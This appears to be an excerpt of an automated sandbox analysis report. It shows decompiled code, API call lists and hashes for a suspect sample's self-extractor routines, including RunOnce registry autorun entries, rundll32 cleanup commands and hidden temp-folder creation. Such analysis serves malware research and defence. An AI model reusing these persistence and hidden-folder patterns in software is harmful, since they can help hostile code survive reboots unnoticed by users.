                                                                                                                                                                                                          				_t28 =  *0x868004; // 0xb82e2007
                                                                                                                                                                                                          				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                          				_t84 = 0x104;
                                                                                                                                                                                                          				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                          				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                          				_t95 = _t94 + 0x18;
                                                                                                                                                                                                          				_t66 = 0;
                                                                                                                                                                                                          				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                          				if(_t36 != 0) {
                                                                                                                                                                                                          					L24:
                                                                                                                                                                                                          					return E00866CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_push(_t86);
                                                                                                                                                                                                          				_t87 = 0;
                                                                                                                                                                                                          				while(1) {
                                                                                                                                                                                                          					E0086171E("wextract_cleanup0", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                          					_t95 = _t95 + 0x10;
                                                                                                                                                                                                          					_t41 = RegQueryValueExA(_v532, "wextract_cleanup0", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                          					if(_t41 != 0) {
                                                                                                                                                                                                          						break;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t87 = _t87 + 1;
                                                                                                                                                                                                          					if(_t87 < 0xc8) {
                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					break;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				if(_t87 != 0xc8) {
                                                                                                                                                                                                          					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                          					_t79 = _t84;
                                                                                                                                                                                                          					E0086658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                          					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                          					_t84 = _t46;
                                                                                                                                                                                                          					if(_t84 == 0) {
                                                                                                                                                                                                          						L10:
                                                                                                                                                                                                          						if(GetModuleFileNameA( *0x869a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                          							L17:
                                                                                                                                                                                                          							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                          							L23:
                                                                                                                                                                                                          							_pop(_t86);
                                                                                                                                                                                                          							goto L24;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						L11:
                                                                                                                                                                                                          						_t72 =  &_v268;
                                                                                                                                                                                                          						_t80 = _t72 + 1;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t49 =  *_t72;
                                                                                                                                                                                                          							_t72 = _t72 + 1;
                                                                                                                                                                                                          						} while (_t49 != 0);
                                                                                                                                                                                                          						_t73 = _t72 - _t80;
                                                                                                                                                                                                          						_t81 = 0x8691e4;
                                                                                                                                                                                                          						do {
                                                                                                                                                                                                          							_t50 =  *_t81;
                                                                                                                                                                                                          							_t81 = _t81 + 1;
                                                                                                                                                                                                          						} while (_t50 != 0);
                                                                                                                                                                                                          						_t84 = _t73 + 0x50 + _t81 - 0x8691e5;
                                                                                                                                                                                                          						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x8691e5);
                                                                                                                                                                                                          						if(_t90 != 0) {
                                                                                                                                                                                                          							 *0x868580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                          							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                          							if(_t66 == 0) {
                                                                                                                                                                                                          								_t54 = "%s /D:%s";
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                          							E0086171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                          							_t75 = _t90;
                                                                                                                                                                                                          							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                          							_t79 = _t23;
                                                                                                                                                                                                          							do {
                                                                                                                                                                                                          								_t56 =  *_t75;
                                                                                                                                                                                                          								_t75 = _t75 + 1;
                                                                                                                                                                                                          							} while (_t56 != 0);
                                                                                                                                                                                                          							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                          							RegSetValueExA(_v532, "wextract_cleanup0", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                          							RegCloseKey(_v532); // executed
                                                                                                                                                                                                          							_t36 = LocalFree(_t90);
                                                                                                                                                                                                          							goto L23;
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          						_t79 = 0x4b5;
                                                                                                                                                                                                          						E008644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                          					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                          					FreeLibrary(_t84); // executed
                                                                                                                                                                                                          					if(_t91 == 0) {
                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                          						E0086658A( &_v268, 0x104, 0x861140);
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          					goto L11;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                          				 *0x868530 = _t66;
                                                                                                                                                                                                          				goto L23;
                                                                                                                                                                                                          			}

































                                                                                                                                                                                                          0x00862196
                                                                                                                                                                                                          0x0086219c
                                                                                                                                                                                                          0x0086219f
                                                                                                                                                                                                          0x0086219f
                                                                                                                                                                                                          0x008621a1
                                                                                                                                                                                                          0x008621a2
                                                                                                                                                                                                          0x008621a6
                                                                                                                                                                                                          0x008621a8
                                                                                                                                                                                                          0x008621b0
                                                                                                                                                                                                          0x008621b0
                                                                                                                                                                                                          0x008621b2
                                                                                                                                                                                                          0x008621b3
                                                                                                                                                                                                          0x008621bc
                                                                                                                                                                                                          0x008621c7
                                                                                                                                                                                                          0x008621cb
                                                                                                                                                                                                          0x008621f1
                                                                                                                                                                                                          0x008621f6
                                                                                                                                                                                                          0x008621fd
                                                                                                                                                                                                          0x008621ff
                                                                                                                                                                                                          0x008621ff
                                                                                                                                                                                                          0x00862204
                                                                                                                                                                                                          0x00862213
                                                                                                                                                                                                          0x00862218
                                                                                                                                                                                                          0x0086221d
                                                                                                                                                                                                          0x0086221d
                                                                                                                                                                                                          0x00862220
                                                                                                                                                                                                          0x00862220
                                                                                                                                                                                                          0x00862222
                                                                                                                                                                                                          0x00862223
                                                                                                                                                                                                          0x00862229
                                                                                                                                                                                                          0x0086223d
                                                                                                                                                                                                          0x00862249
                                                                                                                                                                                                          0x00862250
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862250
                                                                                                                                                                                                          0x008621d2
                                                                                                                                                                                                          0x008621d9
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008621d9
                                                                                                                                                                                                          0x0086213a
                                                                                                                                                                                                          0x00862141
                                                                                                                                                                                                          0x00862144
                                                                                                                                                                                                          0x0086214c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862163
                                                                                                                                                                                                          0x00862172
                                                                                                                                                                                                          0x00862172
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00862163
                                                                                                                                                                                                          0x008620ea
                                                                                                                                                                                                          0x008620f0
                                                                                                                                                                                                          0x00000000

APIs
• memset.MSVCRT ref: 00862050
• memset.MSVCRT ref: 0086205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0086208C
  • Part of subcall function 0086171E: _vsnprintf.MSVCRT ref: 00861750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008620C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008620EA
• GetSystemDirectoryA.KERNEL32 ref: 00862103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00862134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862144
• GetSystemDirectoryA.KERNEL32 ref: 0086215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0086218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008621C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 008621E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup0,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0086223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00862250
Strings
Memory Dump Source
• Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
• Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_860000_W7ANVukbbj.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
• API String ID: 178549006-3765599613
• Opcode ID: 7c576992cf84701b01662a56d23b65b4b9db24b33d5f802f2e8cd7cc4dd4831d
• Instruction ID: c1ccbb6d02372d1561b7acdc0cd0b79dcbfc296107608ab4f8448ec15d464613
• Opcode Fuzzy Hash: 7c576992cf84701b01662a56d23b65b4b9db24b33d5f802f2e8cd7cc4dd4831d
• Instruction Fuzzy Hash: 7B512571A00618EBDB249B64DC4DFEA772CFB51700F0202A4FA59E7291EAB59D488F51
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

[Figure: control-flow graph for the function at 8655a0; legend: Executed / Not Executed]
                                                                                                                                                                                                          C-Code - Quality: 92%
                                                                                                                                                                                                          			E008655A0(void* __eflags) {
                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                          				char _v265;
                                                                                                                                                                                                          				char _v268;
                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                          				signed int _t28;
                                                                                                                                                                                                          				int _t32;
                                                                                                                                                                                                          				int _t33;
                                                                                                                                                                                                          				int _t35;
                                                                                                                                                                                                          				signed int _t36;
                                                                                                                                                                                                          				signed int _t38;
                                                                                                                                                                                                          				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x868004; // 0xb82e2007
				_v8 = _t28 ^ _t110;
				_t2 = E0086468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0086468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x869a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x868b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x868a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00866517(_t82, 0x7d2, 0, E00863210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x869a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x8691e4;
									_t40 = GetTempPathA(0x104, 0x8691e4); // executed
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00861781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00866952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0086597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00862630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0086658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x8691e4;
																					E00861781(0x8691e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00865467(0x8691e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00862630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0086597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
                                                                                                                                                                                                          																					}
                                                                                                                                                                                                          																				}
                                                                                                                                                                                                          																			}
                                                                                                                                                                                                          																		} else {
                                                                                                                                                                                                          																			goto L28;
                                                                                                                                                                                                          																		}
                                                                                                                                                                                                          																	}
                                                                                                                                                                                                          																}
                                                                                                                                                                                                          															}
                                                                                                                                                                                                          														}
                                                                                                                                                                                                          													} else {
                                                                                                                                                                                                          														goto L22;
                                                                                                                                                                                                          													}
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          												goto L47;
                                                                                                                                                                                                          												L42:
                                                                                                                                                                                                          												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                          											} while (_t60 <= 0x5a);
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          										goto L43;
                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                          										_t101 = 1;
                                                                                                                                                                                                          										_t69 = E00865467(0x8691e4, 1, 3); // executed
                                                                                                                                                                                                          										__eflags = _t69;
                                                                                                                                                                                                          										if(_t69 != 0) {
                                                                                                                                                                                                          											goto L45;
                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                          											_t82 = 0x8691e4;
                                                                                                                                                                                                          											_t70 = E00862630(0, 0x8691e4, 1);
                                                                                                                                                                                                          											__eflags = _t70;
                                                                                                                                                                                                          											if(_t70 != 0) {
                                                                                                                                                                                                          												goto L19;
                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                          												_t101 = 1;
                                                                                                                                                                                                          												_t82 = 0x8691e4;
                                                                                                                                                                                                          												_t71 = E00865467(0x8691e4, 1, 1);
                                                                                                                                                                                                          												__eflags = _t71;
                                                                                                                                                                                                          												if(_t71 != 0) {
                                                                                                                                                                                                          													goto L45;
                                                                                                                                                                                                          												} else {
                                                                                                                                                                                                          													do {
                                                                                                                                                                                                          														goto L19;
                                                                                                                                                                                                          														L43:
                                                                                                                                                                                                          														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                          														_push(4);
                                                                                                                                                                                                          														_t101 = 3;
                                                                                                                                                                                                          														_t82 =  &_v268;
                                                                                                                                                                                                          														_t44 = E0086597D(_t82, _t101, 1);
                                                                                                                                                                                                          														__eflags = _t44;
                                                                                                                                                                                                          													} while (_t44 != 0);
                                                                                                                                                                                                          													goto L2;
                                                                                                                                                                                                          												}
                                                                                                                                                                                                          											}
                                                                                                                                                                                                          										}
                                                                                                                                                                                                          									}
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                          							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                          							if(_t35 != 0x5c) {
                                                                                                                                                                                                          								L10:
                                                                                                                                                                                                          								_t72 = 1;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								__eflags =  *0x868b3f - _t35; // 0x0
                                                                                                                                                                                                          								_t72 = 0;
                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                          									goto L10;
                                                                                                                                                                                                          								}
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          							_t101 = 0;
                                                                                                                                                                                                          							_t73 = E00865467(0x868b3e, 0, _t72);
                                                                                                                                                                                                          							__eflags = _t73;
                                                                                                                                                                                                          							if(_t73 != 0) {
                                                                                                                                                                                                          								L45:
                                                                                                                                                                                                          								_t38 = 1;
                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                          								_t101 = 0x4be;
                                                                                                                                                                                                          								E008644B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                          								goto L2;
                                                                                                                                                                                                          							}
                                                                                                                                                                                                          						}
                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                          						_t101 = 0x4b1;
                                                                                                                                                                                                          						E008644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                          						LocalFree(_t109);
                                                                                                                                                                                                          						 *0x869124 = 0x80070714;
                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                          					}
                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                          					_t101 = 0x4b5;
                                                                                                                                                                                                          					E008644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                          					 *0x869124 = E00866285();
                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                          					_t38 = 0;
                                                                                                                                                                                                          				}
                                                                                                                                                                                                          				L47:
                                                                                                                                                                                                          				return E00866CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                          			}





































                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086572b
                                                                                                                                                                                                          0x0086572b
                                                                                                                                                                                                          0x0086572e
                                                                                                                                                                                                          0x00865742
                                                                                                                                                                                                          0x00865742
                                                                                                                                                                                                          0x00865745
                                                                                                                                                                                                          0x0086576b
                                                                                                                                                                                                          0x0086576b
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865747
                                                                                                                                                                                                          0x00865747
                                                                                                                                                                                                          0x0086574d
                                                                                                                                                                                                          0x0086574f
                                                                                                                                                                                                          0x00865771
                                                                                                                                                                                                          0x00865771
                                                                                                                                                                                                          0x00865773
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865751
                                                                                                                                                                                                          0x00865751
                                                                                                                                                                                                          0x00865753
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865755
                                                                                                                                                                                                          0x0086575b
                                                                                                                                                                                                          0x00865760
                                                                                                                                                                                                          0x00865762
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865764
                                                                                                                                                                                                          0x00865764
                                                                                                                                                                                                          0x00865769
                                                                                                                                                                                                          0x0086577e
                                                                                                                                                                                                          0x0086577e
                                                                                                                                                                                                          0x00865781
                                                                                                                                                                                                          0x00865788
                                                                                                                                                                                                          0x0086578d
                                                                                                                                                                                                          0x0086578f
                                                                                                                                                                                                          0x008657b2
                                                                                                                                                                                                          0x008657b8
                                                                                                                                                                                                          0x008657bd
                                                                                                                                                                                                          0x008657bf
                                                                                                                                                                                                          0x008657cd
                                                                                                                                                                                                          0x008657cd
                                                                                                                                                                                                          0x008657dd
                                                                                                                                                                                                          0x008657e3
                                                                                                                                                                                                          0x008657ef
                                                                                                                                                                                                          0x008657f5
                                                                                                                                                                                                          0x008657f8
                                                                                                                                                                                                          0x0086580a
                                                                                                                                                                                                          0x0086580a
                                                                                                                                                                                                          0x008657fa
                                                                                                                                                                                                          0x00865802
                                                                                                                                                                                                          0x00865802
                                                                                                                                                                                                          0x0086580d
                                                                                                                                                                                                          0x0086580f
                                                                                                                                                                                                          0x00865830
                                                                                                                                                                                                          0x00865836
                                                                                                                                                                                                          0x0086583d
                                                                                                                                                                                                          0x0086584b
                                                                                                                                                                                                          0x00865851
                                                                                                                                                                                                          0x00865855
                                                                                                                                                                                                          0x0086585a
                                                                                                                                                                                                          0x0086585c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086585e
                                                                                                                                                                                                          0x0086585e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086585e
                                                                                                                                                                                                          0x00865811
                                                                                                                                                                                                          0x00865817
                                                                                                                                                                                                          0x00865819
                                                                                                                                                                                                          0x0086581f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086581f
                                                                                                                                                                                                          0x00865791
                                                                                                                                                                                                          0x00865797
                                                                                                                                                                                                          0x0086579c
                                                                                                                                                                                                          0x0086579e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008657a0
                                                                                                                                                                                                          0x008657a9
                                                                                                                                                                                                          0x008657ae
                                                                                                                                                                                                          0x008657b0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008657b0
                                                                                                                                                                                                          0x0086579e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865769
                                                                                                                                                                                                          0x00865762
                                                                                                                                                                                                          0x00865753
                                                                                                                                                                                                          0x0086574f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086572e
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00865864
                                                                                                                                                                                                          0x00865864
                                                                                                                                                                                                          0x00865864
                                                                                                                                                                                                          0x00865717
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656c3
                                                                                                                                                                                                          0x008656c5
                                                                                                                                                                                                          0x008656c9
                                                                                                                                                                                                          0x008656ce
                                                                                                                                                                                                          0x008656d0
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656d6
                                                                                                                                                                                                          0x008656d6
                                                                                                                                                                                                          0x008656d8
                                                                                                                                                                                                          0x008656dd
                                                                                                                                                                                                          0x008656df
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656e1
                                                                                                                                                                                                          0x008656e2
                                                                                                                                                                                                          0x008656e4
                                                                                                                                                                                                          0x008656e6
                                                                                                                                                                                                          0x008656eb
                                                                                                                                                                                                          0x008656ed
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x008656f3
                                                                                                                                                                                                          0x008656f3
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0086586c

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646A0
                                                                                                                                                                                                            • Part of subcall function 0086468F: SizeofResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646A9
                                                                                                                                                                                                            • Part of subcall function 0086468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 008646C3
                                                                                                                                                                                                            • Part of subcall function 0086468F: LoadResource.KERNEL32(00000000,00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646CC
                                                                                                                                                                                                            • Part of subcall function 0086468F: LockResource.KERNEL32(00000000,?,00862D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 008646D3
                                                                                                                                                                                                            • Part of subcall function 0086468F: memcpy_s.MSVCRT ref: 008646E5
                                                                                                                                                                                                            • Part of subcall function 0086468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 008646EF
                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 008655CF
                                                                                                                                                                                                          • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00865638
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000), ref: 0086564C
                                                                                                                                                                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00865620
                                                                                                                                                                                                            • Part of subcall function 008644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00864518
                                                                                                                                                                                                            • Part of subcall function 008644B9: MessageBoxA.USER32(?,?,herso,00010010), ref: 00864554
                                                                                                                                                                                                            • Part of subcall function 00866285: GetLastError.KERNEL32(00865BBC), ref: 00866285
                                                                                                                                                                                                          • GetTempPathA.KERNELBASE(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 008656B9
                                                                                                                                                                                                          • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0086571E
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00865737
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 008657CD
                                                                                                                                                                                                          • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 008657EF
                                                                                                                                                                                                          • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00865802
                                                                                                                                                                                                            • Part of subcall function 00862630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00862654
                                                                                                                                                                                                          • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00865830
                                                                                                                                                                                                            • Part of subcall function 00866517: FindResourceA.KERNEL32(00860000,000007D6,00000005), ref: 0086652A
                                                                                                                                                                                                            • Part of subcall function 00866517: LoadResource.KERNEL32(00860000,00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00866538
                                                                                                                                                                                                            • Part of subcall function 00866517: DialogBoxIndirectParamA.USER32(00860000,00000000,00000547,008619E0,00000000), ref: 00866557
                                                                                                                                                                                                            • Part of subcall function 00866517: FreeResource.KERNEL32(00000000,?,?,00862EE8,00000000,008619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00866560
                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00865878
                                                                                                                                                                                                            • Part of subcall function 0086597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 008659A8
                                                                                                                                                                                                            • Part of subcall function 0086597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 008659AF
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.461702172.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.461647733.0000000000860000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461734712.0000000000868000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          • Associated: 00000000.00000002.461756512.000000000086C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
